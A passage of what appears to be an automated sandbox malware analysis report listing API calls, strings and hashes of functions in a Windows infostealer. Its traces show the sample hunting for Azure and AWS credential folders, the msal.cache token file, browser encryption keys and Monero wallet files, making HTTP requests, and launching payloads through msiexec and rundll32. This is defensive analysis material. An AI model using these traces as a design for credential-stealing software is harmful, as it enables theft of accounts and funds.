                            • StrStrA.SHLWAPI(?,0140D358,00000000,?,00611458,00000000,?,00000000,00000000,?,01408940,00000000,?,00611454,00000000,?), ref: 005FCCA2
                            • StrStrA.SHLWAPI(00000000,0140D138), ref: 005FCCB9
                              • Part of subcall function 005FC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 005FC871
                              • Part of subcall function 005FC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 005FC87C
                            • StrStrA.SHLWAPI(?,0140D138,00000000,?,0061145C,00000000,?,00000000,01408820), ref: 005FCD5A
                            • StrStrA.SHLWAPI(00000000,01408A40), ref: 005FCD71
                              • Part of subcall function 005FC820: lstrcat.KERNEL32(?,00610B46), ref: 005FC943
                              • Part of subcall function 005FC820: lstrcat.KERNEL32(?,00610B47), ref: 005FC957
                              • Part of subcall function 005FC820: lstrcat.KERNEL32(?,00610B4E), ref: 005FC978
                            • lstrlen.KERNEL32(00000000), ref: 005FCE44
                            • CloseHandle.KERNEL32(00000000), ref: 005FCE9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                            • String ID:
                            • API String ID: 3744635739-3916222277
                            • Opcode ID: f1ee126b7cde97d335d0704415f5e60457a4b4fe38b00e1045fa1d515d59bbbf
                            • Instruction ID: e8af78458f10e7c5bdba28b4fac9527a921152fa70f15e36c649ebb340bc4991
                            • Opcode Fuzzy Hash: f1ee126b7cde97d335d0704415f5e60457a4b4fe38b00e1045fa1d515d59bbbf
                            • Instruction Fuzzy Hash: 12E10A71950208ABDB48EBE0DC96FEFB77AAF54340F00815DF106661D1EF346A4ACB69
                            Function 00608320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            • RegOpenKeyExA.ADVAPI32(00000000,0140ABC0,00000000,00020019,00000000,006105B6), ref: 006083A4
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00608426
                            • wsprintfA.USER32 ref: 00608459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0060847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0060848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00608499
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 3246050789-3278919252
                            • Opcode ID: c77666eb3818ae3d980c5d94efc36f6b3c5ee74301ef142dbb185760818c477c
                            • Instruction ID: 4dcb0b4690e554d1980c33ff733334b7c8908c88b5af13eae7865e3831c67348
                            • Opcode Fuzzy Hash: c77666eb3818ae3d980c5d94efc36f6b3c5ee74301ef142dbb185760818c477c
                            • Instruction Fuzzy Hash: FA813D71951218AFEB68DB90CC85FEBB7B9FF48700F008698E149A6180DF716B85CF95
                            Function 00604D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00608DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00608E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00604DB0
                            • lstrcat.KERNEL32(?,\.azure\), ref: 00604DCD
                              • Part of subcall function 00604910: wsprintfA.USER32 ref: 0060492C
                              • Part of subcall function 00604910: FindFirstFileA.KERNEL32(?,?), ref: 00604943
                            • lstrcat.KERNEL32(?,00000000), ref: 00604E3C
                            • lstrcat.KERNEL32(?,\.aws\), ref: 00604E59
                              • Part of subcall function 00604910: StrCmpCA.SHLWAPI(?,00610FDC), ref: 00604971
                              • Part of subcall function 00604910: StrCmpCA.SHLWAPI(?,00610FE0), ref: 00604987
                              • Part of subcall function 00604910: FindNextFileA.KERNEL32(000000FF,?), ref: 00604B7D
                              • Part of subcall function 00604910: FindClose.KERNEL32(000000FF), ref: 00604B92
                            • lstrcat.KERNEL32(?,00000000), ref: 00604EC8
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00604EE5
                              • Part of subcall function 00604910: wsprintfA.USER32 ref: 006049B0
                              • Part of subcall function 00604910: StrCmpCA.SHLWAPI(?,006108D2), ref: 006049C5
                              • Part of subcall function 00604910: wsprintfA.USER32 ref: 006049E2
                              • Part of subcall function 00604910: PathMatchSpecA.SHLWAPI(?,?), ref: 00604A1E
                              • Part of subcall function 00604910: lstrcat.KERNEL32(?,0140E540), ref: 00604A4A
                              • Part of subcall function 00604910: lstrcat.KERNEL32(?,00610FF8), ref: 00604A5C
                              • Part of subcall function 00604910: lstrcat.KERNEL32(?,?), ref: 00604A70
                              • Part of subcall function 00604910: lstrcat.KERNEL32(?,00610FFC), ref: 00604A82
                              • Part of subcall function 00604910: lstrcat.KERNEL32(?,?), ref: 00604A96
                              • Part of subcall function 00604910: CopyFileA.KERNEL32(?,?,00000001), ref: 00604AAC
                              • Part of subcall function 00604910: DeleteFileA.KERNEL32(?), ref: 00604B31
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 949356159-974132213
                            • Opcode ID: 8a40b5a59e550acb154e8379522c7068b74687b757607c9e100ce57a9251a29a
                            • Instruction ID: 51a49cc06037d3f6065c53549d29911bde00a64f13c7d8e1c23549a4e48a6d76
                            • Opcode Fuzzy Hash: 8a40b5a59e550acb154e8379522c7068b74687b757607c9e100ce57a9251a29a
                            • Instruction Fuzzy Hash: 7A41B6BA94030867CB54F770DC47FEE7339AB64701F0049587685660C1EDB59BC9CB92
                            Function 00609010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                            Download Yara Rule
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0060906C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateGlobalStream
                            • String ID: image/jpeg
                            • API String ID: 2244384528-3785015651
                            • Opcode ID: d13d7e5c20c23bfc8a4c610557e5c61ff0b4ddc489abb1400cd0608f265b24e7
                            • Instruction ID: 15546eac6c6e5539e59742dc4c6c350df80c84af1ca58784b83cdf709e5a938c
                            • Opcode Fuzzy Hash: d13d7e5c20c23bfc8a4c610557e5c61ff0b4ddc489abb1400cd0608f265b24e7
                            • Instruction Fuzzy Hash: FC710F71950208EBDB08EFE4DC89FEEB7B9BF88700F108518F655A7290DB75A905CB61
                            Function 00602E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            • ShellExecuteEx.SHELL32(0000003C), ref: 006031C5
                            • ShellExecuteEx.SHELL32(0000003C), ref: 0060335D
                            • ShellExecuteEx.SHELL32(0000003C), ref: 006034EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell$lstrcpy
                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                            • API String ID: 2507796910-3625054190
                            • Opcode ID: 11acb0c8cbdd02118cf76125a9d3be87f9a51f096a9ddfe9bd8a7b1b546b2fa1
                            • Instruction ID: bf8a010623982e30b19507ac0f113856399dd5a0351b1e8fa901ad5958e85637
                            • Opcode Fuzzy Hash: 11acb0c8cbdd02118cf76125a9d3be87f9a51f096a9ddfe9bd8a7b1b546b2fa1
                            • Instruction Fuzzy Hash: 7B120C718902089ADB4DEBE0CC92FEFB73AAF54340F50815DE506661D1EF702B4ACB5A
                            Function 006052C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                              • Part of subcall function 005F6280: InternetOpenA.WININET(00610DFE,00000001,00000000,00000000,00000000), ref: 005F62E1
                              • Part of subcall function 005F6280: StrCmpCA.SHLWAPI(?,0140E430), ref: 005F6303
                              • Part of subcall function 005F6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005F6335
                              • Part of subcall function 005F6280: HttpOpenRequestA.WININET(00000000,GET,?,0140DB30,00000000,00000000,00400100,00000000), ref: 005F6385
                              • Part of subcall function 005F6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005F63BF
                              • Part of subcall function 005F6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005F63D1
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00605318
                            • lstrlen.KERNEL32(00000000), ref: 0060532F
                              • Part of subcall function 00608E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00608E52
                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00605364
                            • lstrlen.KERNEL32(00000000), ref: 00605383
                            • lstrlen.KERNEL32(00000000), ref: 006053AE
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 3240024479-1526165396
                            • Opcode ID: d2d065f1b8e45969484ae42904a133efdf972342993c7e6be5d5eb88ac1e6273
                            • Instruction ID: 01b1a093e19fc62cd9cb3f21ee9b3e9dff47fdc16341fe2bfec6fc69ebf3cd51
                            • Opcode Fuzzy Hash: d2d065f1b8e45969484ae42904a133efdf972342993c7e6be5d5eb88ac1e6273
                            • Instruction Fuzzy Hash: B6511B309502089BCB9CEFA0CD96EEF777AAF54340F508018E9065A1D1EF346B46CB66
                            Function 006012D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 8db862d865f0246663dd2660de8184ab36086e48d3bbf71d8a8818e68480de78
                            • Instruction ID: cacfbd884277180768222a4762ba334a8a435372467b964ea402049f7c944ae7
                            • Opcode Fuzzy Hash: 8db862d865f0246663dd2660de8184ab36086e48d3bbf71d8a8818e68480de78
                            • Instruction Fuzzy Hash: 5FC193B59402089BCB58EF60DC89FEB777ABF64300F00459CF50A672C1EA70AA85CF95
                            Function 00604280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00608DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00608E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 006042EC
                            • lstrcat.KERNEL32(?,0140DB48), ref: 0060430B
                            • lstrcat.KERNEL32(?,?), ref: 0060431F
                            • lstrcat.KERNEL32(?,0140CEE0), ref: 00604333
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 00608D90: GetFileAttributesA.KERNEL32(00000000,?,005F1B54,?,?,0061564C,?,?,00610E1F), ref: 00608D9F
                              • Part of subcall function 005F9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 005F9D39
                              • Part of subcall function 005F99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005F99EC
                              • Part of subcall function 005F99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005F9A11
                              • Part of subcall function 005F99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005F9A31
                              • Part of subcall function 005F99C0: ReadFile.KERNEL32(000000FF,?,00000000,005F148F,00000000), ref: 005F9A5A
                              • Part of subcall function 005F99C0: LocalFree.KERNEL32(005F148F), ref: 005F9A90
                              • Part of subcall function 005F99C0: CloseHandle.KERNEL32(000000FF), ref: 005F9A9A
                              • Part of subcall function 006093C0: GlobalAlloc.KERNEL32(00000000,006043DD,006043DD), ref: 006093D3
                            • StrStrA.SHLWAPI(?,0140DB00), ref: 006043F3
                            • GlobalFree.KERNEL32(?), ref: 00604512
                              • Part of subcall function 005F9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N_,00000000,00000000), ref: 005F9AEF
                              • Part of subcall function 005F9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,005F4EEE,00000000,?), ref: 005F9B01
                              • Part of subcall function 005F9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N_,00000000,00000000), ref: 005F9B2A
                              • Part of subcall function 005F9AC0: LocalFree.KERNEL32(?,?,?,?,005F4EEE,00000000,?), ref: 005F9B3F
                            • lstrcat.KERNEL32(?,00000000), ref: 006044A3
                            • StrCmpCA.SHLWAPI(?,006108D1), ref: 006044C0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006044D2
                            • lstrcat.KERNEL32(00000000,?), ref: 006044E5
                            • lstrcat.KERNEL32(00000000,00610FB8), ref: 006044F4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                            • String ID:
                            • API String ID: 3541710228-0
                            • Opcode ID: 0a349363cf4564b1adabc2775383797f40d968d855fc69e778396edf5a07b068
                            • Instruction ID: af3ca023e8845ce3af380a7297a5a129fd24f9e34e70fc4ae620bf89d6b9daa6
                            • Opcode Fuzzy Hash: 0a349363cf4564b1adabc2775383797f40d968d855fc69e778396edf5a07b068
                            • Instruction Fuzzy Hash: 467165B6900208ABCB58FBE4DC89FEE7779BB88300F048598F64597181EA75DB45CF91
                            Function 005F1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 005F12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005F12B4
                              • Part of subcall function 005F12A0: RtlAllocateHeap.NTDLL(00000000), ref: 005F12BB
                              • Part of subcall function 005F12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005F12D7
                              • Part of subcall function 005F12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005F12F5
                              • Part of subcall function 005F12A0: RegCloseKey.ADVAPI32(?), ref: 005F12FF
                            • lstrcat.KERNEL32(?,00000000), ref: 005F134F
                            • lstrlen.KERNEL32(?), ref: 005F135C
                            • lstrcat.KERNEL32(?,.keys), ref: 005F1377
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
